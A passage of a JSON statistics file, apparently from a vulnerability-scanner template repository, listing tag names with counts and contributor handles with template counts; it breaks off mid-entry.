,{"name":"xml","count":1},{"name":"easyappointments","count":1},{"name":"piwigo","count":1},{"name":"cve2000","count":1},{"name":"abbott","count":1},{"name":"webex","count":1},{"name":"delta","count":1},{"name":"rwebserver","count":1},{"name":"yaws","count":1},{"name":"lg-nas","count":1},{"name":"sponip","count":1},{"name":"mapbox","count":1},{"name":"whmcs","count":1},{"name":"appweb","count":1},{"name":"geolocation","count":1},{"name":"mojoauth","count":1},{"name":"email","count":1},{"name":"pan","count":1},{"name":"zoomsounds","count":1},{"name":"interactsh","count":1},{"name":"fastly","count":1},{"name":"holidayapi","count":1},{"name":"loganalyzer","count":1},{"name":"intelx","count":1},{"name":"eventtickets","count":1},{"name":"clockwork","count":1},{"name":"quip","count":1},{"name":"fortressaircraft","count":1},{"name":"pagerduty","count":1},{"name":"phpfastcache","count":1},{"name":"wix","count":1},{"name":"landrayoa","count":1},{"name":"rmi","count":1},{"name":"droneci","count":1},{"name":"xamr","count":1},{"name":"darkstat","count":1},{"name":"fanwei","count":1},{"name":"pmb","count":1},{"name":"edgeos","count":1},{"name":"opencart","count":1},{"name":"acexy","count":1},{"name":"gateway","count":1},{"name":"privx","count":1},{"name":"bedita","count":1},{"name":"h3c-imc","count":1},{"name":"gridx","count":1},{"name":"kenesto","count":1},{"name":"pagespeed","count":1},{"name":"ninjaform","count":1},{"name":"rubedo","count":1},{"name":"tuxedo","count":1},{"name":"stridercd","count":1},{"name":"oam","count":1},{"name":"dnssec","count":1},{"name":"simplecrm","count":1},{"name":"petfinder","count":1},{"name":"nps","count":1},{"name":"box","count":1},{"name":"micro","count":1},{"name":"daybyday","count":1},{"name":"tectuus","count":1},{"name":"sls","count":1},{"name":"dwsync","count":1},{"name":"asana","count":1},{"name":"apos","count":1},{"name":"caa","count":1},{"name":"kodi","count":1},{"name":"gunicorn","count":1},{"name":"openx","count":1},{"name":"finereport","count":1},{"name":"coinranking","count":1},{"name":"openerp","count":1},{"name":"avatier","count":1},{"name":"youtube","count":1},{"name":"shopware","count":1},{"name":"qsan","count":1},{"name":"books","count":1},{"name":"google-earth","count":1},{"name":"blackboard","count":1},{"name":"duomicms","count":1},{"name":"rainloop","count":1},{"name":"buildbot","count":1},{"name":"oauth2","count":1},{"name":"postmark","count":1},{"name":"thedogapi","count":1},{"name":"cryptocurrencies","count":1},{"name":"chronoforums","count":1},{"name":"veeam","count":1},{"name":"adb","count":1},{"name":"dotclear","count":1},{"name":"episerver","count":1},{"name":"securenvoy","count":1},{"name":"bazarr","count":1},{"name":"expn","count":1},{"name":"calendly","count":1},{"name":"eyoucms","count":1},{"name":"opnsense","count":1},{"name":"eyesofnetwork","count":1},{"name":"webmail","count":1},{"name":"bing","count":1},{"name":"codemeter","count":1},{"name":"magicflow","count":1},{"name":"mi","count":1},{"name":"revealjs","count":1},{"name":"monitoring","count":1},{"name":"iucn","count":1},{"name":"pods","count":1},{"name":"asus","count":1},{"name":"uwsgi","count":1},{"name":"domino","count":1},{"name":"sslmate","count":1},{"name":"buildkite","count":1},{"name":"caseaware","count":1},{"name":"dasan","count":1},{"name":"ncomputing","count":1},{"name":"tjws","count":1},{"name":"api-manager","count":1},{"name":"portal","count":1},{"name":"dbt","count":1},{"name":"skywalking","count":1},{"name":"diris","count":1},{"name":"novius","count":1},{"name":"processmaker","count":1},{"name":"imap","count":1},{"name":"shindig","count":1},{"name":"zend","count":1},{"name":"lutron","count":1},{"name":"etouch","count":1},{"name":"perl","count":1},{"name":"microfocus","count":1},{"name":"labtech","count":1},{"name":"dicoogle","count":1},{"name":"wdja","count":1},{"name":"ns","count":1},{"name":"oki","count":1},{"name":"twig","count":1},{"name":"h2","count":1},{"name":"vscode","count":1},{"name":"newsletter","count":1},{"name":"tufin","count":1},{"name":"h3c","count":1},{"name":"qdpm","count":1},{"name":"nutanix","count":1},{"name":"smi","count":1},{"name":"socomec","count":1},{"name":"tplink","count":1},{"name":"fullhunt","count":1},{"name":"ignition","count":1},{"name":"timeclock","count":1},{"name":"ixbusweb","count":1},{"name":"weboftrust","count":1},{"name":"panasonic","count":1},{"name":"announcekit","count":1},{"name":"discord","count":1},{"name":"oidc","count":1},{"name":"mod-proxy","count":1},{"name":"moin","count":1},{"name":"ricoh","count":1},{"name":"tugboat","count":1},{"name":"wazuh","count":1},{"name":"atvise","count":1},{"name":"rsyncd","count":1},{"name":"intelliflash","count":1},{"name":"timesheet","count":1},{"name":"markdown","count":1},{"name":"coinmarketcap","count":1},{"name":"default","count":1},{"name":"yishaadmin","count":1},{"name":"alchemy","count":1},{"name":"xyxel","count":1},{"name":"krweb","count":1},{"name":"incapptic-connect","count":1},{"name":"kodexplorer","count":1},{"name":"zuul","count":1},{"name":"dolphinscheduler","count":1},{"name":"bullwark","count":1},{"name":"yachtcontrol","count":1},{"name":"tika","count":1},{"name":"discourse","count":1},{"name":"zcms","count":1},{"name":"viaware","count":1},{"name":"myvuehelp","count":1},{"name":"jaspersoft","count":1},{"name":"ulterius","count":1},{"name":"malwarebazaar","count":1},{"name":"bible","count":1},{"name":"trilithic","count":1},{"name":"extractor","count":1},{"name":"kvm","count":1},{"name":"sso","count":1},{"name":"sauter","count":1},{"name":"hanming","count":1},{"name":"chevereto","count":1},{"name":"karel","count":1},{"name":"starttls","count":1},{"name":"mspcontrol","count":1},{"name":"cname","count":1},{"name":"wondercms","count":1},{"name":"cvnd2018","count":1},{"name":"viewlinc","count":1},{"name":"erp-nc","count":1},{"name":"mautic","count":1},{"name":"floc","count":1},{"name":"osquery","count":1},{"name":"pippoint","count":1},{"name":"st","count":1},{"name":"urlscan","count":1},{"name":"express","count":1},{"name":"dnn","count":1},{"name":"netgenie","count":1},{"name":"adafruit","count":1},{"name":"eyoumail","count":1},{"name":"piano","count":1},{"name":"ilo4","count":1},{"name":"tarantella","count":1},{"name":"redhat","count":1},{"name":"zoneminder","count":1},{"name":"yarn","count":1},{"name":"connect-central","count":1},{"name":"ewebs","count":1},{"name":"intellect","count":1},{"name":"sgp","count":1},{"name":"acsoft","count":1},{"name":"beanstalk","count":1},{"name":"secnet","count":1},{"name":"kyocera","count":1},{"name":"sprintful","count":1},{"name":"gateone","count":1},{"name":"emerson","count":1},{"name":"raspberrymatic","count":1},{"name":"ecosys","count":1},{"name":"secret","count":1},{"name":"opm","count":1},{"name":"workspace","count":1},{"name":"edgemax","count":1},{"name":"totaljs","count":1},{"name":"netweaver","count":1},{"name":"flyteconsole","count":1},{"name":"lenovo","count":1},{"name":"yopass","count":1},{"name":"php-fusion","count":1},{"name":"owa","count":1},{"name":"fleet","count":1},{"name":"solarview","count":1},{"name":"ntopng","count":1},{"name":"froxlor","count":1},{"name":"mdb","count":1},{"name":"hrsale","count":1},{"name":"idemia","count":1},{"name":"spotify","count":1},{"name":"vsphere","count":1},{"name":"musicstore","count":1},{"name":"malshare","count":1},{"name":"eyelock","count":1},{"name":"sourcecodester","count":1},{"name":"nordex","count":1},{"name":"piluscart","count":1},{"name":"werkzeug","count":1},{"name":"esmtp","count":1},{"name":"gloo","count":1},{"name":"adiscon","count":1},{"name":"tracer","count":1},{"name":"projectdiscovery","count":1},{"name":"ueditor","count":1},{"name":"cors","count":1},{"name":"springframework","count":1},{"name":"tekon","count":1},{"name":"speed","count":1},{"name":"ecsimagingpacs","count":1},{"name":"pulsesecure","count":1},{"name":"supervisor","count":1},{"name":"locations","count":1},{"name":"cobub","count":1},{"name":"opensmtpd","count":1},{"name":"whm","count":1},{"name":"mx","count":1},{"name":"alertmanager","count":1},{"name":"solman","count":1},{"name":"playable","count":1},{"name":"parentlink","count":1},{"name":"cve2004","count":1},{"name":"weiphp","count":1},{"name":"fudforum","count":1},{"name":"clansphere","count":1},{"name":"upnp","count":1},{"name":"logontracer","count":1},{"name":"expose","count":1},{"name":"sceditor","count":1},{"name":"siemens","count":1},{"name":"elevation","count":1},{"name":"siebel","count":1},{"name":"allied","count":1},{"name":"checkmarx","count":1},{"name":"comodo","count":1},{"name":"tor","count":1},{"name":"smuggling","count":1},{"name":"defi","count":1},{"name":"flowci","count":1},{"name":"contentkeeper","count":1},{"name":"mofi","count":1},{"name":"kindeditor","count":1},{"name":"goanywhere","count":1},{"name":"fatwire","count":1},{"name":"micro-user-service","count":1},{"name":"microcomputers","count":1},{"name":"stem","count":1},{"name":"novnc","count":1},{"name":"achecker","count":1},{"name":"appveyor","count":1},{"name":"etherscan","count":1},{"name":"ssi","count":1},{"name":"streetview","count":1},{"name":"phabricator","count":1},{"name":"version","count":1},{"name":"bitquery","count":1},{"name":"biostar2","count":1},{"name":"workreap","count":1},{"name":"etcd","count":1},{"name":"limit","count":1},{"name":"dixell","count":1},{"name":"ddownload","count":1},{"name":"geutebruck","count":1},{"name":"flask","count":1},{"name":"spf","count":1},{"name":"mailboxvalidator","count":1},{"name":"taiga","count":1},{"name":"aims","count":1},{"name":"eyou","count":1},{"name":"ocs-inventory","count":1},{"name":"blockfrost","count":1},{"name":"hdnetwork","count":1},{"name":"aura","count":1},{"name":"b2bbuilder","count":1},{"name":"nexusdb","count":1},{"name":"details","count":1},{"name":"nc2","count":1},{"name":"iserver","count":1},{"name":"cve2021wordpress","count":1},{"name":"sage","count":1},{"name":"bitcoinaverage","count":1},{"name":"zm","count":1},{"name":"qvisdvr","count":1},{"name":"ruoyi","count":1},{"name":"teradici","count":1},{"name":"dahua","count":1},{"name":"coinlayer","count":1},{"name":"bhagavadgita","count":1},{"name":"iceflow","count":1},{"name":"planon","count":1},{"name":"glowroot","count":1},{"name":"minimouse","count":1},{"name":"shodan","count":1},{"name":"ipvpn","count":1},{"name":"identityguard","count":1},{"name":"secmail","count":1},{"name":"phoronix","count":1},{"name":"yealink","count":1},{"name":"vsftpd","count":1},{"name":"sassy","count":1},{"name":"debounce","count":1},{"name":"web-dispatcher","count":1},{"name":"browserless","count":1},{"name":"gurock","count":1},{"name":"keenetic","count":1},{"name":"okiko","count":1},{"name":"instatus","count":1},{"name":"spidercontrol","count":1},{"name":"adfs","count":1},{"name":"acontent","count":1},{"name":"calendarix","count":1},{"name":"twitter-server","count":1},{"name":"nifi","count":1},{"name":"nvrmini","count":1},{"name":"softaculous","count":1},{"name":"kramer","count":1},{"name":"hue","count":1},{"name":"bonita","count":1},{"name":"webctrl","count":1},{"name":"fortilogger","count":1},{"name":"wifisky","count":1},{"name":"zmanda","count":1},{"name":"dokuwiki","count":1},{"name":"ipstack","count":1},{"name":"activecollab","count":1},{"name":"zenphoto","count":1},{"name":"short.io","count":1},{"name":"securitytrails","count":1},{"name":"opencast","count":1},{"name":"wakatime","count":1},{"name":"kyan","count":1},{"name":"xmlchart","count":1},{"name":"htmli","count":1},{"name":"rijksmuseum","count":1},{"name":"phalcon","count":1},{"name":"visionhub","count":1},{"name":"zeppelin","count":1},{"name":"gstorage","count":1},{"name":"netbiblio","count":1},{"name":"pyramid","count":1},{"name":"find","count":1},{"name":"nsasg","count":1},{"name":"mantis","count":1},{"name":"dss","count":1},{"name":"lotuscms","count":1},{"name":"ptr","count":1},{"name":"cofax","count":1},{"name":"contactform","count":1},{"name":"billquick","count":1},{"name":"xmpp","count":1},{"name":"zarafa","count":1},{"name":"threatq","count":1},{"name":"couchcms","count":1},{"name":"kubeflow","count":1},{"name":"spinnaker","count":1},{"name":"apple","count":1},{"name":"cgit","count":1},{"name":"vercel","count":1},{"name":"route","count":1},{"name":"covalent","count":1},{"name":"ecom","count":1},{"name":"grails","count":1},{"name":"block","count":1},{"name":"ucs","count":1},{"name":"concourse","count":1},{"name":"oliver","count":1},{"name":"formcraft3","count":1},{"name":"clickhouse","count":1},{"name":"solarlog","count":1},{"name":"superwebmailer","count":1},{"name":"optiLink","count":1},{"name":"amcrest","count":1},{"name":"gerapy","count":1},{"name":"salesforce","count":1},{"name":"roundcube","count":1},{"name":"agegate","count":1},{"name":"robomongo","count":1},{"name":"74cms","count":1},{"name":"fastcgi","count":1},{"name":"harvardart","count":1},{"name":"catfishcms","count":1},{"name":"opensns","count":1},{"name":"neo4j","count":1},{"name":"landray","count":1},{"name":"wowza","count":1},{"name":"polarisft","count":1},{"name":"realteo","count":1},{"name":"omi","count":1},{"name":"monitorr","count":1},{"name":"pyspider","count":1},{"name":"tianqing","count":1},{"name":"hetzner","count":1},{"name":"maxsite","count":1},{"name":"cse","count":1},{"name":"pieregister","count":1},{"name":"zentral","count":1},{"name":"boa","count":1},{"name":"mappress","count":1},{"name":"nweb2fax","count":1},{"name":"axiom","count":1},{"name":"raspap","count":1},{"name":"dapp","count":1},{"name":"projector","count":1},{"name":"mastodon","count":1},{"name":"overflow","count":1},{"name":"cve2001","count":1},{"name":"tieline","count":1},{"name":"bingmaps","count":1},{"name":"webui","count":1},{"name":"deviantart","count":1},{"name":"instagram","count":1},{"name":"emc","count":1},{"name":"ymhome","count":1},{"name":"submitty","count":1},{"name":"guppy","count":1},{"name":"olivetti","count":1},{"name":"charity","count":1},{"name":"thinkadmin","count":1},{"name":"expressjs","count":1},{"name":"caddy","count":1},{"name":"jenzabar","count":1},{"name":"satellian","count":1},{"name":"wing-ftp","count":1},{"name":"sonarcloud","count":1},{"name":"workresources","count":1},{"name":"chaos","count":1},{"name":"strider","count":1},{"name":"clustering","count":1},{"name":"mongoshake","count":1},{"name":"k8","count":1},{"name":"wiki","count":1},{"name":"notebook","count":1},{"name":"netrc","count":1},{"name":"trane","count":1},{"name":"saltapi","count":1},{"name":"sefile","count":1},{"name":"dom","count":1},{"name":"apcu","count":1},{"name":"webeditors","count":1},{"name":"pandorafms","count":1},{"name":"prismaweb","count":1},{"name":"b2evolution","count":1},{"name":"geocode","count":1},{"name":"sofneta","count":1},{"name":"nerdgraph","count":1},{"name":"pinata","count":1},{"name":"servicedesk","count":1},{"name":"stackstorm","count":1},{"name":"getgrav","count":1},{"name":"knowage","count":1},{"name":"primefaces","count":1},{"name":"snipeit","count":1},{"name":"opengear","count":1},{"name":"meshcentral","count":1},{"name":"racksnet","count":1},{"name":"huemagic","count":1},{"name":"directions","count":1},{"name":"accent","count":1},{"name":"tamronos","count":1},{"name":"jabber","count":1},{"name":"adoptapet","count":1},{"name":"varnish","count":1},{"name":"idera","count":1},{"name":"phpwiki","count":1},{"name":"aniapi","count":1},{"name":"testrail","count":1},{"name":"mozilla","count":1},{"name":"abstractapi","count":1},{"name":"webmodule-ee","count":1},{"name":"xvr","count":1},{"name":"dropbox","count":1},{"name":"goip","count":1},{"name":"cx","count":1},{"name":"tracing","count":1},{"name":"dribbble","count":1},{"name":"buddy","count":1},{"name":"mdm","count":1},{"name":"myucms","count":1},{"name":"memcached","count":1},{"name":"soar","count":1},{"name":"dotnetcms","count":1},{"name":"phpunit","count":1},{"name":"natemail","count":1},{"name":"lumis","count":1},{"name":"basic-auth","count":1},{"name":"tinypng","count":1},{"name":"bravenewcoin","count":1},{"name":"seopanel","count":1},{"name":"eg","count":1},{"name":"activeadmin","count":1},{"name":"bolt","count":1},{"name":"telecom","count":1},{"name":"emessage","count":1},{"name":"dvr","count":1},{"name":"directum","count":1},{"name":"tracking","count":1},{"name":"pypicloud","count":1},{"name":"barracuda","count":1},{"name":"calendarific","count":1},{"name":"burp","count":1},{"name":"intellislot","count":1},{"name":"biometrics","count":1},{"name":"tinymce","count":1},{"name":"pirelli","count":1},{"name":"svnserve","count":1},{"name":"mkdocs","count":1},{"name":"cve2002","count":1},{"name":"trello","count":1},{"name":"acemanager","count":1}],"authors":[{"name":"daffainfo","count":565},{"name":"dhiyaneshdk","count":424},{"name":"pikpikcu","count":316},{"name":"pdteam","count":268},{"name":"geeknik","count":181},{"name":"dwisiswant0","count":168},{"name":"0x_akoko","count":139},{"name":"princechaddha","count":139},{"name":"pussycat0x","count":124},{"name":"gy741","count":122},{"name":"madrobot","count":65},{"name":"zzeitlin","count":64},{"name":"ritikchaddha","count":53},{"name":"idealphase","count":50},{"name":"gaurang","count":42},{"name":"philippedelteil","count":36},{"name":"adam crosser","count":30},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"c-sh0","count":24},{"name":"akincibor","count":22},{"name":"ffffffff0x","count":22},{"name":"for3stco1d","count":20},{"name":"righettod","count":19},{"name":"techbrunchfr","count":18},{"name":"cckuailong","count":17},{"name":"pr3r00t","count":15},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":14},{"name":"r3dg33k","count":14},{"name":"0ri2n","count":13},{"name":"sharath","count":13},{"name":"suman_kar","count":12},{"name":"sullo","count":12},{"name":"melbadry9","count":12},{"name":"wdahlenb","count":11},{"name":"edoardottt","count":11},{"name":"cyllective","count":11},{"name":"meme-lord","count":10},{"name":"random_robbie","count":10},{"name":"nadino","count":10},{"name":"johnk3r","count":10},{"name":"alph4byt3","count":10},{"name":"hackergautam","count":10},{"name":"dogasantos","count":10},{"name":"emadshanab","count":9},{"name":"0x240x23elu","count":8},{"name":"random-robbie","count":8},{"name":"zh","count":8},{"name":"aashiq","count":8},{"name":"iamthefrogy","count":8},{"name":"that_juan_","count":8},{"name":"logicalhunter","count":8},{"name":"oppsec","count":7},{"name":"harshbothra_","count":7},{"name":"forgedhallpass","count":7},{"name":"divya_mudgal","count":7},{"name":"caspergn","count":7},{"name":"techryptic (@tech)","count":7},{"name":"randomstr1ng","count":7},{"name":"dr_set","count":7},{"name":"kophjager007","count":7},{"name":"leovalcante","count":6},{"name":"pathtaga","count":6},{"name":"__fazal","count":6},{"name":"evan rubinstein","count":6},{"name":"imnightmaree","count":6},{"name":"veshraj","count":6},{"name":"puzzlepeaches","count":6},{"name":"rootxharsh","count":6},{"name":"pentest_swissky","count":6},{"name":"iamnoooob","count":6},{"name":"_0xf4n9x_","count":5},{"name":"panch0r3d","count":5},{"name":"yanyun","count":5},{"name":"xelkomy","count":5},{"name":"podalirius","count":5},{"name":"tess","count":5},{"name":"lu4nx","count":5},{"name":"ganofins","count":5},{"name":"praetorian-thendrickson","count":5},{"name":"joanbono","count":5},{"name":"elsfa7110","count":5},{"name":"nodauf","count":4},{"name":"tanq16","count":4},{"name":"defr0ggy","count":4},{"name":"dolev farhi","count":4},{"name":"incogbyte","count":4},{"name":"h1ei1","count":4},{"name":"dadevel","count":4},{"name":"wisnupramoedya","count":4},{"name":"e_schultze_","count":4},{"name":"whoever","count":3},{"name":"gitlab red team","count":3},{"name":"_generic_human_","count":3},{"name":"emenalf","count":3},{"name":"supras","count":3},{"name":"jarijaas","count":3},{"name":"alifathi-h1","count":3},{"name":"0w4ys","count":3},{"name":"mavericknerd","count":3},{"name":"me9187","count":3},{"name":"f1tz","count":3},{"name":"skeltavik","count":3},{"name":"sushantkamble","count":3},{"name":"impramodsargar","count":3},{"name":"andydoering","count":3},{"name":"johnjhacking","count":3},{"name":"dr0pd34d","count":3},{"name":"thomas_from_offensity","count":3},{"name":"fyoorer","count":3},{"name":"shifacyclewala","count":3},{"name":"binaryfigments","count":3},{"name":"z3bd","count":3},{"name":"arcc","count":3},{"name":"mr-xn","count":3},{"name":"davidmckennirey","count":3},{"name":"github.com/its0x08","count":3},{"name":"lark-lab","count":3},{"name":"3th1c_yuk1","count":3},{"name":"yuzhe-zhang-0","count":3},{"name":"shine","count":3},{"name":"unstabl3","count":3},{"name":"dudez","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"r3naissance","count":3},{"name":"n-thumann","count":2},{"name":"kre80r","count":2},{"name":"parth","count":2},{"name":"ehsahil","count":2},{"name":"splint3r7","count":2},{"name":"nvn1729","count":2},{"name":"socketz","count":2},{"name":"cocxanh","count":2},{"name":"manas_harsh","count":2},{"name":"prajiteshsingh","count":2},{"name":"smaranchand","count":2},{"name":"w4cky_","count":2},{"name":"0xsmiley","count":2},{"name":"convisoappsec","count":2},{"name":"x1m_martijn","count":2},{"name":"koti2","count":2},{"name":"ajaysenr","count":2},{"name":"danielmofer","count":2},{"name":"0xprial","count":2},{"name":"sy3omda","count":2},{"name":"gal nagli","count":2},{"name":"amsda","count":2},{"name":"geekby","count":2},{"name":"nkxxkn","count":2},{"name":"vavkamil","count":2},{"name":"moritz nentwig","count":2},{"name":"pxmme1337","count":2},{"name":"cristi vlad (@cristivlad25)","count":2},{"name":"z0ne","count":2},{"name":"joeldeleep","count":2},{"name":"hahwul","count":2},{"name":"bernardofsr","count":2},{"name":"k11h-de","count":2},{"name":"y4er","count":2},{"name":"redteambrasil","count":2},{"name":"rafaelwdornelas","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"dahse89","count":2},{"name":"r12w4n","count":2},{"name":"vsh00t","count":2},{"name":"kiblyn11","count":2},{"name":"sbani","count":2},{"name":"nuk3s3c","count":2},{"name":"0xsapra","count":2},{"name":"gevakun","count":2},{"name":"zomsop82","count":2},{"name":"dheerajmadhukar","count":2},{"name":"its0x08","count":2},{"name":"cckuakilong","count":2},{"name":"lotusdll","count":2},{"name":"thardt-praetorian","count":2},{"name":"paperpen","count":2},{"name":"raesene","count":2},{"name":"badboycxcc","count":2},{"name":"randomrobbie","count":2},{"name":"luci","count":2},{"name":"bsysop","count":2},{"name":"udit_thakkur","count":2},{"name":"taielab","count":2},{"name":"mohammedsaneem","count":2},{"name":"bing0o","count":2},{"name":"g4l1t0","count":2},{"name":"hetroublemakr","count":2},{"name":"bp0lr","count":2},{"name":"hackerarpan","count":2},{"name":"bananabr","count":2},{"name":"paradessia","count":2},{"name":"fabaff","count":2},{"name":"0xrudra","count":2},{"name":"ree4pwn","count":2},{"name":"0xcrypto","count":2},{"name":"martincodes-de","count":2},{"name":"hassan khan yusufzai - splint3r7","count":2},{"name":"swissky","count":2},{"name":"afaq","count":2},{"name":"joshlarsen","count":2},{"name":"foulenzer","count":2},{"name":"0xelkomy","count":2},{"name":"huowuzhao","count":2},{"name":"ambassify","count":2},{"name":"exploitation","count":1},{"name":"retr02332","count":1},{"name":"geraldino2","count":1},{"name":"justmumu","count":1},{"name":"higor melgaço (eremit4)","count":1},{"name":"fopina","count":1},{"name":"v0idc0de","count":1},{"name":"arm!tage","count":1},{"name":"blckraven","count":1},{"name":"arall","count":1},{"name":"aaronchen0","count":1},{"name":"gboddin","count":1},{"name":"duty_1g","count":1},{"name":"ahmetpergamum","count":1},{"name":"patralos","count":1},{"name":"exceed","count":1},{"name":"zhenwarx","count":1},{"name":"pratik khalane","count":1},{"name":"tea","count":1},{"name":"kabirsuda","count":1},{"name":"kareemse1im","count":1},{"name":"toufik-airane","count":1},{"name":"aresx","count":1},{"name":"harshinsecurity","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"evolutionsec","count":1},{"name":"xeldax","count":1},{"name":"sec_hawk","count":1},{"name":"andirrahmani1","count":1},{"name":"c3l3si4n","count":1},{"name":"brenocss","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"b0yd","count":1},{"name":"iampritam","count":1},{"name":"matthew nickerson (b0than) @ layer 8 security","count":1},{"name":"yavolo","count":1},{"name":"fmunozs","count":1},{"name":"b4uh0lz","count":1},{"name":"vzamanillo","count":1},{"name":"hakluke","count":1},{"name":"nullfuzz","count":1},{"name":"philippdelteil","count":1},{"name":"zinminphy0","count":1},{"name":"affix","count":1},{"name":"ringo","count":1},{"name":"remi gascou (podalirius)","count":1},{"name":"clarkvoss","count":1},{"name":"dievus","count":1},{"name":"momen eldawakhly","count":1},{"name":"akshansh","count":1},{"name":"th3.d1p4k","count":1},{"name":"rodnt","count":1},{"name":"ipanda","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"alex","count":1},{"name":"remonsec","count":1},{"name":"undefl0w","count":1},{"name":"osamahamad","count":1},{"name":"flag007","count":1},{"name":"miroslavsotak","count":1},{"name":"izn0u","count":1},{"name":"ok_bye_now","count":1},{"name":"cookiehanhoan","count":1},{"name":"becivells","count":1},{"name":"fq_hsu","count":1},{"name":"furkansayim","count":1},{"name":"0ut0fb4nd","count":1},{"name":"shreyapohekar","count":1},{"name":"kh4sh3i","count":1},{"name":"tim_koopmans","count":1},{"name":"notnotnotveg","count":1},{"name":"luqmaan hadia","count":1},{"name":"f1she3","count":1},{"name":"tirtha_mandal","count":1},{"name":"sshell","count":1},{"name":"ldionmarcil","count":1},{"name":"brabbit10","count":1},{"name":"mrcl0wnlab","count":1},{"name":"skylark-lab","count":1},{"name":"mass0ma","count":1},{"name":"infosecsanyam","count":1},{"name":"thesubtlety","count":1},{"name":"dhiyaneshdki","count":1},{"name":"jas37","count":1},{"name":"kiks7","count":1},{"name":"un-fmunozs","count":1},{"name":"xshuden","count":1},{"name":"0xh7ml","count":1},{"name":"alevsk","count":1},{"name":"anon-artist","count":1},{"name":"schniggie","count":1},{"name":"daviey","count":1},{"name":"charanrayudu","count":1},{"name":"exid","count":1},{"name":"ilovebinbash","count":1},{"name":"kaizensecurity","count":1},{"name":"andysvints","count":1},{"name":"myztique","count":1},{"name":"francescocarlucci","count":1},{"name":"makyotox","count":1},{"name":"elmahdi","count":1},{"name":"iphantasmic","count":1},{"name":"orpheus","count":1},{"name":"lark lab","count":1},{"name":"korteke","count":1},{"name":"sherlocksecurity","count":1},{"name":"yuansec","count":1},{"name":"apt-mirror","count":1},{"name":"dawid-czarnecki","count":1},{"name":"juicypotato1","count":1},{"name":"whynotke","count":1},{"name":"2rs3c","count":1},{"name":"bad5ect0r","count":1},{"name":"alexrydzak","count":1},{"name":"jeya seelan","count":1},{"name":"xstp","count":1},{"name":"wlayzz","count":1},{"name":"adrianmf","count":1},{"name":"ahmed abou-ela","count":1},{"name":"akash.c","count":1},{"name":"berkdusunur","count":1},{"name":"ofjaaah","count":1},{"name":"sicksec","count":1},{"name":"qlkwej","count":1},{"name":"absshax","count":1},{"name":"omarkurt","count":1},{"name":"florianmaak","count":1},{"name":"d4vy","count":1},{"name":"soyelmago","count":1},{"name":"luqman","count":1},{"name":"regala_","count":1},{"name":"official_blackhat13","count":1},{"name":"husain","count":1},{"name":"kailashbohara","count":1},{"name":"ola456","count":1},{"name":"zsusac","count":1},{"name":"rotemreiss","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"bartu utku sarp","count":1},{"name":"ph33r","count":1},{"name":"b0rn2r00t","count":1},{"name":"j33n1k4","count":1},{"name":"knassar702","count":1},{"name":"prettyboyaaditya","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"notsoevilweasel","count":1},{"name":"manuelbua","count":1},{"name":"luqmaan hadia [luqiih](https://github.com/luqiih)","count":1},{"name":"opencirt","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"micha3lb3n","count":1},{"name":"0xteles","count":1},{"name":"kurohost","count":1},{"name":"w0tx","count":1},{"name":"ggranjus","count":1},{"name":"0xtavian","count":1},{"name":"elouhi","count":1},{"name":"zandros0","count":1},{"name":"droberson","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"jbertman","count":1},{"name":"co0nan","count":1},{"name":"_harleo","count":1},{"name":"mah3sec_","count":1},{"name":"coldfish","count":1},{"name":"0xceba","count":1},{"name":"intx0x80","count":1},{"name":"tirtha","count":1},{"name":"bughuntersurya","count":1},{"name":"act1on3","count":1},{"name":"pdp","count":1},{"name":"0xd0ff9","count":1},{"name":"clment cruchet","count":1},{"name":"0xceeb","count":1},{"name":"manasmbellani","count":1},{"name":"yashgoti","count":1},{"name":"jeya.seelan","count":1},{"name":"jteles","count":1},{"name":"ahmed sherif","count":1},{"name":"jrolf","count":1},{"name":"oscarintherocks","count":1},{"name":"breno_css","count":1},{"name":"mesaglio","count":1},{"name":"yashanand155","count":1},{"name":"compr00t","count":1},{"name":"ohlinge","count":1},{"name":"0xrod","count":1},{"name":"chron0x","count":1},{"name":"streetofhackerr007","count":1},{"name":"elder tao","count":1},{"name":"d0rkerdevil","count":1},{"name":"ooooooo_q","count":1},{"name":"mubassirpatel","count":1},{"name":"evan rubinstien","count":1},{"name":"shifacyclewla","count":1},{"name":"daffianfo","count":1},{"name":"retr0","count":1},{"name":"push4d","count":1},{"name":"furkansenan","count":1},{"name":"lethargynavigator","count":1},{"name":"shelld3v","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"bernardo rodrigues @bernardofsr","count":1},{"name":"amnotacat","count":1},{"name":"noamrathaus","count":1},{"name":"hanlaomo","count":1},{"name":"jiheon-dev","count":1},{"name":"igibanez","count":1},{"name":"deena","count":1},{"name":"rubina119","count":1},{"name":"jbaines-r7","count":1},{"name":"rojanrijal","count":1},{"name":"hexcat","count":1},{"name":"nerrorsec","count":1},{"name":"bjhulst","count":1},{"name":"revblock","count":1},{"name":"sickwell","count":1},{"name":"willd96","count":1},{"name":"arr0way","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"thezakman","count":1},{"name":"alperenkesk","count":1},{"name":"pudsec","count":1},{"name":"_darrenmartyn","count":1},{"name":"narluin","count":1},{"name":"udyz","count":1},{"name":"nielsing","count":1},{"name":"s1r1u5_","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"mhdsamx","count":1},{"name":"wabafet","count":1},{"name":"majidmc2","count":1},{"name":"bibeksapkota (sar00n)","count":1},{"name":"thebinitghimire","count":1},{"name":"noobexploiter","count":1},{"name":"0h1in9e","count":1},{"name":"rschio","count":1},{"name":"_c0wb0y_","count":1},{"name":"p-l-","count":1},{"name":"petruknisme","count":1},{"name":"luskabol","count":1},{"name":"thevillagehacker","count":1},{"name":"nytr0gen","count":1},{"name":"borna 